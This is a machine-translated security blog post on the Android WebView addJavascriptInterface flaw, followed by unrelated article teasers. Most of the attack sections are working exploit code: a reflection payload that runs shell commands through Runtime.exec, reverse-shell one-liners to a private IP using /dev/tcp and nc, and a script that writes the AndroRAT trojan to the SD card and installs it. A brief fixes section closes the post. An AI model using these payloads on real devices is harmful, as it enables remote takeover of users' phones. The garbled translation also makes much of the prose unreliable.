There are security vulnerabilities in Android applications , Browse the website and open the link . At present, there is a white hat submission vulnerability, which indicates that there is a common security vulnerability in applications on Android platform , Opening a link can lead to remote installation of malicious applications and even complete control of the user's mobile phone , At present, wechat , mobile phone QQ,QVOD And all the major mobile browsers have won

0x00 background


stay android Of sdk Encapsulated webView Control . This control is mainly used to open the control of web browsing . Load... In the program webView Control , You can set properties ( Color , Font, etc. ). similar PC Next directUI The function of . stay webView There is a very special interface function addJavascriptInterface. Can achieve local java and js Interaction . utilize addJavascriptInterface This interface function can achieve penetration webkit control android This machine .

0x01 Detection and utilization


In general use html To design an application page, it's almost inevitable to use addJavascriptInterface, Including but not limited to android browser .

stay android This is how code programs are used :

1
2
3
settings.setJavaScriptEnabled( true );
settings.setJavaScriptCanOpenWindowsAutomatically( true );
mWebView.addJavascriptInterface( new JSInvokeClass(), "js2java" );

You can use it here

apk->zip->dex->dex2jar->jdgui->java

Code to find .

But recommended apktool Decompile smali( After all, not all apk Can be decompiled into java Code )

stay smali In the code Is similar to the following code :

const-string v0, " js2java "
invoke-virtual {p1, v1, v0},Lcom/tiantianmini/android/browser/module/ac;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V

When the above code is detected , It can be further verified by :

stay 11 year , Someone has taken advantage of addJavascriptInterface Read and write files , And release the simple poc, To 12 There was a simple execution of code in exp. Using reflection callbacks java Class . Such as the following utilization code ;

<script>
function execute(cmdArgs)
{
    return js2java.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}

</script>  

utilize java Of exec perform linux Of shell command .

0x02 Remote access shell


To paraphrase yuange A word of :Poc Far less than exp The value of .

utilize addJavascriptInterface Realization shell.

Android Inside armlinux It's not busybox Of , Some conventional bullets shell The way to do it is limited .

Used java Rebound of shell Method

//execute(["/system/bin/sh","-c","exec 5<>/dev/tcp/192.168.1.9/8088;cat <&5 | while read line; do $line 2>&5 >&5; done"]);

stay Nexus One 4.3 Of android virtual machine It didn't pop up successfully shell.

After the discovery android Can be executed in nc command ( Castrated version without -e Of nc)

This is used here. nc Another kind of bullet shell The way to complete

Exp Content :

1
2
3
4
5
6
7
8
<script>
function execute(cmdArgs)
{
return XXX.getClass().forName( "java.lang.Runtime" ).getMethod( "getRuntime" , null ).invoke( null , null ).exec(cmdArgs);
}
execute([ "/system/bin/sh" , "-c" , "nc 192.168.1.9 8088|/system/bin/sh|nc 192.168.1.9 9999" ]);
alert( "ok3" );
</script>

// notes xxx For privacy protection xx Generation refers to .

The effect is as follows

Of course, you can use remote IP Address .

0x03 Remote mount


After all, android Environmental Science ,shell It's not very convenient to use . similar xsser I'm not satisfied with that .

Further sublimation , Realize the web page hanging horse .

Android 4.1 Has joined ASLR technology , Pile jetting is no longer effective .UAF Aim at android The kernel version of . At present, it is a reliable method to exploit the loopholes of its own characteristics .

Here we use androrat Take remote control Trojan horse as an example .

Realize the web page hanging horse

Most browsers have prompted you to save the downloaded files . Here we need to put andrat.apk Write it on the Pegasus website .

1
2
3
4
5
6
7
8
9
10
11
<script>
function execute(cmdArgs)
{
return xxx.getClass().forName( "java.lang.Runtime" ).getMethod( "getRuntime" , null ).invoke( null , null ).exec(cmdArgs);
}
 
var armBinary = "\x50\x4B\x03\x04\x14\x00\x08\x00\x08\x00\x51\x8F\xCA\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x04\x00\x72\x65\x73\x2F\x6C\x61\x79\x6F\x75\x74\x2F\x6D\x61\x69\x6E\x2E\x78\x6D\x6C\xFE\xCA\x00\x00\xAD\x52\x31\x6F\xD3\x40\x18\xFD\x2E\x76\xAE\x86\xC4\x69\x5A\x3A\x54\xA2\x12\xA9\xC4\x80\x22\x61\xE3\xAA\x42\x4D\xC7\x22\x86\x4A\x91\xA8\x14\xC4\x0A\x56\x7C\xC2\x27\x68\x1C\x39\x57\x0A\x53\x11\x3B\x63\x37\x06\xFE\x01\x33\x1B\x43\x17\x36\x56\xFE\x07\xAC\x6D\x9F\xCB\x1D\x3D\x
……
var patharm = " /data/app/Androrat.apk ";
var a=execute([" /system/bin/sh "," -c "," echo -n +armBinary+ > " + patharm]);
execute([" chmod "," 755 "," /data/app/Androrat.apk"]);

There are several problems :

andrat.apk Of hex value about 300k, Browser or java Of exec There may be restrictions on the size of incoming parameters ,( The tested browser is limited and cannot be executed )

/data/app/ There is a permission problem with the directory , need root,chmod It's the same thing .

Android This silent installation either has root Or system signed install jurisdiction , Or make it look like pre installed software and restart it . Or is it 2.2 The version is about Hide by calling api install .

After that fuzz experiment , Completed the hanging horse function :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<script>
function execute(cmdArgs)
{
return xxx.getClass().forName( "java.lang.Runtime" ).getMethod( "getRuntime" , null ).invoke( null , null ).exec(cmdArgs);
}
 
var armBinary1 = "\x50\x4B\x03\x04\x14\x00\x08\x00\x08\x00\x51\x8F\xCA\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x04\x00\x72\x65\x73\x2F\x6C\x61\x79\x6F\x75\x74\x2F\x6D\x61\x69\x6E\x2E\x78\x6D\x6C\xFE\xCA\x00\x00\xAD\x52\x31\x6F\xD3\x40\x18\xFD\x2E\x76\xAE\x86\xC4\x69\x5A\x3A\x54\xA2\x12\xA9\xC4
 
var armBinary2=" \x1B\xB0\x65\x0A\xAD\x23\xC2\x30\x64\xDF\xEE\xA1\x0D\xA4\xE8\x3F\x61\x80\xEE\xBC\xE1\xE7\x7B\x4A\x25\x6F\x8B\x36\x71\xC3\x80\x81\x58\xDB\xC9\x8F\x53\x9F\xEE\x8A\x45\xAF\x23\x54\x4A\xCF\x2B\x52\xF2\x33\x84\xBA\x82\x36\xC4\x0D\x08\xAF\xC2\x61\x8E\xD8\x7B\x0B\xFC\x88\x4A\x25\x24\x8C\x22\xFA\x76\x44\x78\x5E\x99\x62\x30\x44\x8D\xDB\x74\x94\
 
var armBinary3=…
var armBinary4=…
……
var patharm = "/mnt/sdcard/Androrat.apk" ;
var a=execute([ "/system/bin/sh" , "-c" , "echo -n +armBinary1+ > " + patharm]);
//alert(a);
execute([ "/system/bin/sh" , "-c" , "echo -n +armBinary2+ >> " + patharm]);
execute([ "/system/bin/sh" , "-c" , "echo  -n +armBinary3+ >> " + patharm]);
execute([ "/system/bin/sh" , "-c" , "echo -n +armBinary4+ >> " + patharm]);
execute([ "/system/bin/sh" , "-c" , "adb install /mnt/sdcard/Androrat.apk" ]);
alert( "over !!!" );
</script>

take androrat.apk Split .

utilize echo Write to sdcard in ( This directory is readable and writable Unenforceable ).

Use what you bring adb Installation ( Installation of various xx There are many mobile phone assistants ).

Androrat Successful installation , It's used here androrat Of debug=true Pattern .

Successfully connected to the control side .

0x04 Repair


1、Android 4.2 (api17) New interface functions have been introduced 【java It should be called method :) 】,@JavascriptInterface   Instead of addjavascriptInterface, There are some android 2.3 No more upgrades , Browsers need to be compatible .

2、 In the use of js2java Of bridge When , Each parameter passed in needs to be validated , Block attack code .

3、 Control the relevant permissions or use as little as possible js2java Of bridge.

Link:
http://developer.android.com/reference/android/webkit/WebView.html
http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf
http://50.56.33.56/blog/?p=314

Android WebView In the interface hidden trouble and mobile phone hang horse use ( Remote command execution ) More articles about

  1. hybird app Project instance : Android webview in HTML5 Take photos, upload pictures

    Application platform environment : Android webview: Technical points involved : (1) <input type="file" > : In development , Android webview By default, clicking cannot call file selection and camera taking ...

  2. Java Use in Oracle The client of load data and sqlldr Command execution, data import into database

    Windows Test code in the environment : import java.io.BufferedReader; import java.io.File; import java.io.FileNotFoundExcep ...

  3. stay WebView How to make JS And Java Call each other safely

    In the native development of Android Applications , In order to pursue the efficiency of development and the convenience of transplantation , Use WebView As the main carrier of business content display and interaction, it's a good compromise . So in this kind of Hybrid( Hybrid ) App in , It's hard to avoid a page JS need ...

  4. WebView High risk interface security testing

    High-risk ]WebView The high-risk interface security detection has 2 Here's the details : stay Android System 4.3.1~3.0 edition , System webview Default added searchBoxJavaBridge_ Interface , If the interface is not removed, it may result in a lower version ...

  5. Solve the problem caused by setting font size on mobile phone h5 Page in webview In the process of transformation BUG

    First , We made a H5 page , It's OK to open it in all kinds of mobile browsers . We used rem Unit layout , adopt JS To dynamically calculate the window width of a web page , Dynamic setting html Of font-size, Everything is perfect . Now , You're confident ...

  6. Android Security development WebView Mines in the world

    Android Security development WebView Mines in the world 0X01 About WebView stay Android In development , Often use WebView To achieve WEB Page presentation , stay Activiry Start your own browser in , perhaps ...

  7. Android Security development WebView The big hole in the world

    0X01 About WebView stay Android In development , Often use WebView To achieve WEB Page presentation , stay Activiry Start your own browser in , Or simply show some online content, etc .WebView Powerful ...

  8. Redis in 7 There are three types of application scenarios &amp;redis Common commands

    Redis Common data types Redis The most commonly used data types are as follows : String Hash List Set Sorted set Before describing these data types specifically , Let's get to know... Through a picture Redis Inside ...

  9. Android WebView Summarize... In the project

    One . brief introduction In Android development, we will encounter many functions to deal with web pages , The following is what I use in practice to share with you 1. Display and render Web page 2. Can and JavaScript Interactive call Two . Common methods // Activate WebView Is active ...

Random recommendation

  1. wind Take the transaction calendar n day data

    days=AlldaysPeriod=Mw.tdaysoffset(5,'20171212','days=Tradingdays;Period=D')

  2. AndroidUI The layout of design - Detailed analysis of the layout implementation

    Write a summary of the blog : The concept that has not been made clear before is clarified Parent container and this container properties  : android_layout... Properties are properties of this container , Defined in the layout manager's LayoutParams In the inner class , Every layout manager ...

  3. css2---- If the single line is too long, it will be omitted

    li{ width:300px; white-space:nowrap; How to deal with li Blank space in the container ,nowrap Table forces no line breaks , Until the text ends or hits </br> text-overflow ...

  4. [React Fundamentals] Development Environment Setup

    In this lesson we'll setup a simple build process for converting our ES6 React components into ES5 u ...

  5. tomcat The startup window is garbled

    stay tomcat Home directory conf Folder , find logging.properties file : Open in Notepad , Find out java.util.logging.ConsoleHandler.encoding ...

  6. Vue In the life cycle mounted and created The difference between

    Reference link :https://blog.csdn.net/xdnloveme/article/details/78035065

  7. fastJson And JSONPath Use

    1. JSONPath Introduce Official website address : https://github.com/alibaba/fastjson/wiki/JSONPath fastjson 1.2.0 Later versions support JSONPath. ...

  8. azkaban Configure mail

    1. Please configure email in azkaban-web-server To configure : Here's the picture :      /opt/azkaban/azkaban/azkaban-web-server/build/install/azka ...

  9. onmouseover and onmouseout Of bug

    The brain is not working well , It takes a few times to remember something , I've learned something several times , Grief . Accustomed to the jquery Of hover, Or have seen hover Source code , Or just beautiful < framework design >,onmouseover and onmous ...

  10. cookie Explain

    cookie:( Translate it : Dessert ) It means that no matter who you are, you like this little thing Take Google for example : cookie: It's something that stores data , Storage capacity ( It's a small amount of storage , about 4KB) Stored in the client , On computer , On the application device Application scenarios : user ...